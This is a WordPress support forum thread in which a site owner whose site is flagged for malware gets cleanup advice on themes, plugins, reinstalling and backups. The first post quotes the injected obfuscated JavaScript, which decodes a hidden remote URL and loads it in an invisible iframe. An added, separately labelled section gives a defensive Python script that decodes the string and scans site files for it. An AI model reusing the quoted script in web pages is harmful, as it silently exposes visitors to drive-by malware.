Malware Problem (18 posts)

  1. ajay182
    Member
    Posted 3 years ago #

    Hi guys,

    Getting alerts from Firefox whenever accessing my site (http://overratingtheunderrated.com) about badware/malware. I've found out through another forum that there is some bad code, but they haven't told me where/how to find and delete it. Can anyone advise?

    This is the code:

    <script>
    function getfncelement(a) {
      if (a==0) return 'A104A116A116A112A58A47A47A99A108A101A97A110A102A105A108A101A46A110A101A116A47A46A112A104A47A50A47';
      if (a==1) return 'split';
      if (a==2) return 'fromCharCode';
      if (a==3) return 'IFRAME';
      if (a==4) return 1;
    }
    var gnitssssssssssssssssss = String;

    var a_bnMJnWIagV = getfncelement(0);
    var a_ErVOWoUayU = a_bnMJnWIagV[getfncelement(1)]("A");
    var a_LEdeDyQRPa = "";
    for (var a_frOsBBOKcu=1; a_frOsBBOKcu<a_ErVOWoUayU.length; a_frOsBBOKcu++)
    {a_LEdeDyQRPa+=gnitssssssssssssssssss[getfncelement(2)](a_ErVOWoUayU[a_frOsBBOKcu]);}
    var testFrame = document.createElement(getfncelement(3));
    testFrame.src = a_LEdeDyQRPa;
    testFrame.width = getfncelement(4);
    testFrame.height = getfncelement(4);
    document.body.appendChild(testFrame);
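
Added example, not part of the original thread: a Python sketch that decodes the letter-delimited character-code string from the script in the first post without running it, and scans a site directory for files carrying the same encoding, which is one way to check whether a reinstall removed the injection. The regular expression, the file-suffix list and the function names are assumptions of this example; the sample string is the one quoted in the post.

```python
import re
from pathlib import Path

# Quoted run of <letter><decimal char code> pairs, e.g. 'A104A116A116A112...'.
# Assumption: 8+ pairs sharing one delimiter letter is suspicious enough to flag.
ENCODED = re.compile(r"""['"](([A-Za-z])\d{2,3}(?:\2\d{2,3}){7,})['"]""")

# Encoded string exactly as quoted in the forum post.
SAMPLE = ("'A104A116A116A112A58A47A47A99A108A101A97A110A102A105A108A101"
          "A46A110A101A116A47A46A112A104A47A50A47'")


def decode_charcodes(encoded):
    """Rebuild the text the script assembles with split() + fromCharCode()."""
    delim = encoded[0]
    # split() yields an empty first element, which the script also skips (i = 1).
    return "".join(chr(int(code)) for code in encoded.split(delim)[1:])


def find_encoded_strings(text):
    """Return the decoded form of every encoded literal found in text."""
    return [decode_charcodes(m.group(1)) for m in ENCODED.finditer(text)]


def scan_tree(root, suffixes=(".php", ".js", ".html", ".htm")):
    """Map relative file path -> decoded strings for files under root."""
    hits = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            decoded = find_encoded_strings(path.read_text(errors="replace"))
            if decoded:
                hits[str(path.relative_to(root))] = decoded
    return hits


if __name__ == "__main__":
    import sys
    print(find_encoded_strings(SAMPLE))  # decode the sample from the post
    target = sys.argv[1] if len(sys.argv) > 1 else "."
    for name, decoded in scan_tree(target).items():
        print(name, decoded)
```

An empty result from `scan_tree` only shows that this one encoding is absent from the scanned files; it does not cover other obfuscation styles or content stored in the database.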

  2. Michelle Langston
    Theme Wrangler at Automattic
    Posted 3 years ago #

    I suggest removing your theme and resetting it to the default Twenty-Ten theme. Then you could just download a new copy of WordPress and replace all of the existing files with the new ones. Go through all of your directories via FTP to make sure there is nothing suspicious there. Remove any files or folders that aren't part of WordPress or any other program that you KNOW you installed. Good luck!

  3. David Gwyer
    Member
    Posted 3 years ago #

    This could also be caused by a Plugin. Try deactivating all your Plugins then see if you still have the problem. Then (before deleting anything) switch your theme to the default theme (you might want to install the latest Twenty Ten version from the repo to be sure you switch to a clean theme).

    See if either of those does the trick.

  4. ajay182
    Member
    Posted 3 years ago #

    Hi,

    Would removing my theme not result in losing all of my current theme options and such?

    Also, I'm quite new at all this sort of stuff, I'm not sure what it is that I should be looking for, i.e. what is out of the ordinary.

  5. David Gwyer
    Member
    Posted 3 years ago #

    Yes it could do, that is why I said don't delete anything yet! You don't need to right away, you can switch themes without deleting your current one (just make another one the active theme).

  6. Michelle Langston
    Theme Wrangler at Automattic
    Posted 3 years ago #

    Yeah, try what dgwyer suggests first. You can reset your theme to the default one without losing any of your settings. Theme settings are stored in the database, so they are not affected by the actual theme files on the server.

  7. ajay182
    Member
    Posted 3 years ago #

    Hi,

    I've deactivated all plugins and changed theme but it is still showing up as a malware site.

  8. David Gwyer
    Member
    Posted 3 years ago #

    Even if you have cleaned out your code, it might still be flagged as malware in the browser because it has been temporarily blocked by Google(?).

  9. ajay182
    Member
    Posted 3 years ago #

    How would I be able to confirm I have in fact cleaned out the code though? Nothing has changed between now and then.

  10. ajay182
    Member
    Posted 3 years ago #

    I've lodged a request with Google to reinstate me, but I'm not sure how to test whether the reinstalls etc. actually got rid of the code.

  11. Delete the .maintenance file at root.

    You're getting a malware warning because you've been hacked:
    http://www.google.com/safebrowsing/diagnostic?site=overratingtheunderrated.com

    A GoDaddy restore won't necessarily fix that.

    See "FAQ: My site was hacked « WordPress Codex", "How to completely clean your hacked wordpress installation" and "How to find a backdoor in a hacked WordPress"

    And

  12. ajay182
    Member
    Posted 3 years ago #

    Hi,

    I've checked the Google webmaster link, that was where I got the code in the OP from. I've checked those links and have taken many of those steps already. It seems the only one I haven't done is restored it to a backup version.

  13. ajay182
    Member
    Posted 3 years ago #

    Google diagnostic is now showing there are other infections, specifically a couple of trojans. Is there no way to erase them without restoring a backup?

    Also, questions if I do have to restore a backup:

    -How do I do it?
    -Will I lose the extensive customisation on my theme?
    -I know I have to reinstall plugins - does that mean I lose statistics associated with the plugins (e.g. WordPress stats, Akismet stats etc.)?

  14. Google diagnostic is now showing there are other infections, specifically a couple of trojans. Is there no way to erase them without restoring a backup?

    Follow the guides that songdogtech linked to.

    Also, questions if I do have to restore a backup:

    -How do I do it?

    Follow this guide:

    http://codex.wordpress.org/Restoring_Your_Database_From_Backup

    Will I lose the extensive customisation on my theme?

    Not if they were backed up.

    I know I have to reinstall plugins - does that mean I lose statistics associated with the plugins (e.g. WordPress stats, Akismet stats etc.)?

    It's always a possibility. I'd call it a fair trade-off for a clean site.

  15. ajay182
    Member
    Posted 3 years ago #

    Appreciate the reply. The backups were automated by a plugin and are in sql.gz format - are these the right backups? I'm being frightened by seeing backups in other formats hovering around!

  16. ajay182
    Member
    Posted 3 years ago #

    Hi all,

    Problem seems to be OK now, I assume one of your recommendations above fixed things, many thanks! Are there any steps I can take to secure my site?

  17. Yes, you'll probably want to implement some (if not all) of the recommended security measures.

  18. kickoff3pm
    Member
    Posted 3 years ago #

    I recently had this, not sure but found some code at the top of an old cache file I left in the wpcontent root. I had also left the cache statements in the htaccess file so I assume it would be possible to piggy back those cache files and redirect.

Topic Closed

This topic has been closed to new replies.